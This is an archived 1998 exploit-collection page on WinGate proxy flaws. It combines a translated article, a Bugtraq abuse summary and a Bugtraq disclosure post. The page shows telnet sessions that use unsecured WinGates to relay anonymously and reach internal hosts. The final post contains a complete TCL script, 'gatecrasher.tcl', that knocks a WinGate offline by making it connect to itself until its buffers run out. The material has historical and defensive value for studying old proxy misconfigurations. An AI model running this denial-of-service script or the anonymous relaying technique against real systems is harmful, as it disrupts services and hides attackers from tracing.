Wingate telnet redirection

Summary
Description:A somewhat common technique for attackers is to install "telnet redirectors" on a system they have compromised. This allows them to telnet to the redirector and then telnet out from there anonymously, masking their true point of origin. These attackers no longer need to bother with penetrating systems, as the Wingate includes anonymous telnet redirection as a feature enabled by default! Just telnet to port 1080 or 23 and then telnet right back out to wreak havok on the internet. And don't worry, it doesn't (by default) log anything! <sigh>
Author:Alans other account <alanb@MANAWATU.GEN.NZ>
Compromise:Intruders can mask their true point of origin by going through Wingate
Vulnerable Systems:Windows boxes running Wingate
Date:11 February 1998
Notes:Many thanks to Dairo Bel <dairo@akrata.org> for translating his spanish article on Wingate and sending it in! Also note that you can use nmap, a network portscanner I wrote to locate hosts on your network that are running Wingate.
Details



Date: Wed, 06 May 1998 22:37:04 +0300
From: Dairo Bel 
To: fyodor@nmap.org
Subject: WinGate> Use and Abuse

Hi fyodor:

[cut]

-----------------------------cut here--------------------------------
Well, here iīm going to explain to all of you, the amazing use that one Wingate could have.
But... start in the begining.

1.- Overview:

Imagine that we have 3 computers in our home, but we have only one modem. Of course, we would
like be able to access to the Internet with the 3 computers, but there are an obvious problem;
although these computers was connected in a Net, only the one wich have the modem can access to
the internet. The way to be able to access with all of them, is a Proxy software. One Proxy (if
somebody donīt know it), is something like a footbridge, in manner than you can jump to another
place; in this case, the internet.
What it does, is negotiate the different request to go out wich we do in our 3 computers net.
Althoug only the first computer was connected to the internet, the second and third could been
connected through it.


2.- Software:

One WinGate is a Windows95 or WindowsNT software, wich negotiate the request of our little net.
The way to implementate it, is (like all in windows) very simple, even it have options by
default. The other computers has internal IPs, wich when it goes out of the little net, the
wingate change those IPs, by its own IP, so, it seems that all the request have been made by the
same computer, when in fact, it isnīt true. The port opened by default is 1080


3.- Description:

The footbridges wich was used by our 3 computers, should be closed to everybody who didnīt belong
to our little net. Thats why anyone could connect to our Wingate, and leave with our IP address.

The main bug, is that the wingate donīt try to authenticate the user who is connecting with it.

The way this can occur is simply making telnet to the Wingate IP, and will appear to us:
WinGate>

Then, we can use it like a footbridge, because it thinks that the attacker is one of the internal
net computer. Is enough to put the IP to wich i want to connect, and from there, it leave to
Internet with the wingate IP. For example, if our net is im.agoodboy.com, one attacker, for
example im.abadguy.com could do this:

im.abadguy.com$ telnet im.agoodboy.com
trying.. im.agoodboy.com
connected
WinGate>193.158.24.5
trying... 193.158.24.5
connected
System RH 4.2
login:

Etc. Well, what the attacker has been done, is connect from im.abadguy.com to the Wingate (our
net), and through it, to the 193.158.24.5 IP. The IP that 193.158.24.5 will receive, will be the
Wingate IP (our IP!) nor the attacker IP.

That isnīt the only thing that he could do. If he wants, he could make this trough any another
port, like ftp, mail, etc. From here, we can deduce that we could be able to send *totally*
anonymous mail, like if it was one remailer, or one of those old sendmails.

Another weakness in the Wingates, is that  if we know the IPs in the Internal Net, we can have
totall acces without any problem. If the computers in the internal net are running under Windows,
and i have installed samba (to have access to the wingate), we can connect directly to them. If
the internal computers are running under some UNIX, we can do a telnet to them. Please, think
what could occur if the internal computers have one ++ in their .rhosts file to have a simple
acces between them. The owner of the little net, was thinking that he is safe from the external
attacks, because he is protected by a proxy... when it isnīt certainly.

If we put one Wingate like a server in our IRC client, we can send commands to another IRC
server, by virtue of /quote or /raw (depending of the client).  Itīs possible to jump to another
site in that manner too.

Another possible attack may occur if our little net has shared resources. In that case, the
attacker could configure the Wingate like his default gateway. After that, he could be able to
"see" all the computers in our network, because the wingate thinks that he is one of them. In
this manner, the Wingate turn into something like a router for the attacker. If he wanted, for
example, he could put one sniffer in their own machine. All the information which leaves from our
network, should pass first through the Wingate, and through the attacker after that...

One more possibility is to connect with a Wingate in 808 port. If itīs bad configured, may be two
things. The machine could crash, or we could enter directly to their internal net. This
vulnerability nor always works, but sometimes yes. I canīt determine why.

Finally, only say that the Wingate donīt keep *any* type of logs. If you connect to a Wingate,
nobody will be able to know which was the IP connected to it. In Wingate versions 1.3 and 1.3*,
the Wingate software DON'T keep logs, and didnīt exists any option to keep it. Itīs 100%
anonymous. Version 2.0 there are one option, and if you activate it, the logs was keeped. By
default, that option isnīt activated. About 80% of the companys wich used Wingate, has the 1.3
version of this software, so if any use it in a malicious mode, you will be anonymous.


4.- Conclusions

If we donīt take care in quit all of the gateways wich give acces from the network, and keep only
the proxy, the Wingate software lets one attacker connect through it, and camouflage him in a
perfectly anonymous mode.

In the same face, under certainly conditions, is possible to have access to the computers in the
internal network.
This bug exists until 2.0 version at last.

5.- Greetings:

To my loved girlfriend M.A., and to the man who gives to me the idea to use one wingate as a
gateway.

dairo@akrata.org

If you wants, you can use this pgp key to mail me:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 4.5

mQENAjUkvQEAAAEIALVsQBpEksdzCJksy1t8lqU1oYNcCsuUc9TsXcCd/rDNDECD
v8rX+DIdblhVoWx/7V24tB2H5ekJKAY7Ntgw8TEngmDY8xAlpniCwYN/Q3sD82IN
cSXyRykld9x37EWcvMIffh3d/bRxmFYuVweLd+6wm36utwVuJ9IE6kibrQmDese4
ne2G0dQl7K/xnOSxIE71sSxuB4+qcmWtnjPNwXi1OOiX9FWMlL+C5HONFhVxe1jL
gFDT7okryAb4CJFQi4D/5uhz8HPT1HGwRa8ox24LttArK+xFnsQ2SAjg8af401Yo
sHNZktjjdBz1HkWRouonKUrTYyBSDVkEFJENRPkABRG0HERhaXJvIEJlbCA8ZGFp
cm9AYWtyYXRhLm9yZz4=
=a2Bz
-----END PGP PUBLIC KEY BLOCK-----

-----------------------------cut here--------------------------------

Best Regards,
   Dairo Bel
                                 oOo !Hispahack Research Team oOo

Date: Wed, 11 Feb 1998 15:14:02 +1300
From: Alans other account <alanb@MANAWATU.GEN.NZ>
To: BUGTRAQ@NETSPACE.ORG
Subject: WIngate: the sequel

I've had a fair amount of mail following my posting about this to
the list. What follows is a very brief summary.

1: Confirmation that a large number of sites have already
experienced spammers smtp relaying via insecure wingates. Numbers
relayed have ranged from "a couple of thousand" to "over 20,000"
messages.

2: Ditto on nntp. This seems to be a favourite method for porn
spammers in particular.

3: Ditto on IRC. I have a mirc IRC abuse script onhand which quite
happily searches for wingates and attaches one floodbot per
gateway. Tests have shown that upwards of 100 wingates can quite
easily be used by a single attacker.

4: Open wingates are also wide open for any savvy attacker to
attach to machines behind the wingate "firewall".

5: Although the primary attack method is to use socks port 1080,
the same techniques are easily used on port 23, so firewalling
socks is a temporary solution at best.


All of these are worrying, given the number of people who attack
sites perceived as participating in spam.

There's a fairly good set of web pages on securing wingate at
http://www.deerfield.com/wingate/secure-wingate.htm - this appears
to be the Wingate home site.


The Undernet IRC network has had to temporarily lock out users from
2 large cable networks in Canada and the USA due to attacks against
network admins. Those attacks were at one point coming from upwards
of 200 different IPs and seemed to be driven by one individual.

Given Wingate's lack of logging facilities, there is almost no hope
of tracing attackers who initiate denial of service actions like
this, so ISPs may well face having this kind of action taken
against them by IRC (or other) networks in order to maintain
usability of their systems. The end result is chaos on helpdesks.

Wingate's authors apparently are continuing to ignore the abuse
issues associated with default settings.
How long before they get the message?

AB

From carother@OU.EDU Wed May 13 00:48:32 1998
Date: Sat, 21 Feb 1998 04:38:56 -0600
From: Matt Carothers <carother@OU.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: WinGate DoS

After a WinGate attack on our IRC channel, a friend of mine was toying around and discovered a fun bug:

$ telnet unsecured.wingate.com
Trying XXX.XX.XX.XXX...
Connected to XXX.XX.XX.XXX.
Escape character is '^]'.

WinGate>localhost
Connecting to host localhost...Connected

As you can see, the WinGate happily connects to itself. Do this enough times, and ...

WinGate>localhost
Connecting to host localhost...Out of buffers

At this point, the WinGate stops forwarding connections. Clients can still connect but cannot make use of it.

Below is a simple TCL exploit to demonstrate the idea.

#!/usr/local/bin/tclsh

# gatecrasher.tcl
#
# This opens a WinGate and connects it to itself repeatedly until the # target machine runs out of buffers and stops forwarding connections. # The WinGate will not function as long as the script is running. #
# Credit goes to Chris Snell <texan@hooked.net> for finding the bug. #
# I apologize in advance for not being cool enough to script this is perl. #
# - Matt Carothers <carother@ou.edu>

set host [lindex $argv 0];
set port [lindex $argv 1];

if {![string compare $host ""]} {
set command [string range $argv0 [expr [string last / $argv0] + 1] end]; puts stdout "Usage: $command <host> \[port\]"; exit 1;
}

if {![string compare $port ""]} {
set port 23;
}

if {[catch {set sock [socket $host $port]} stuff]} { # Could not connect for some reason. Output an error message and exit. puts stdout "$host:$port : $stuff";
exit 1;
}

puts stdout "Connected to $host:$port. Launching WinGate kill ...";

set flag 0;

puts $sock "localhost";
flush $sock;

while {[gets $sock line] >= 0} {
if {[string match "*Connected*" $line]} { # We've successfully connected the WinGate to itself. # Whee, let's do it again.

puts $sock "localhost";
flush $sock;

puts -nonewline stdout ".";
flush stdout;

set flag 0;
} elseif {[string match "*Out of buffers*" $line]} { # The WinGate is now out of buffers. # We'll output a message to that effect and keep trying. This # serves as a keep-alive and lets us jump in and fill any buffers # freed by clients which disconnect after the attack succeeds.

if {!$flag} {

      puts stdout "\n*plink*";
      set flag 1;

}

puts $sock "localhost";
flush $sock;
}
}

puts stdout "\nConnection lost.";


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: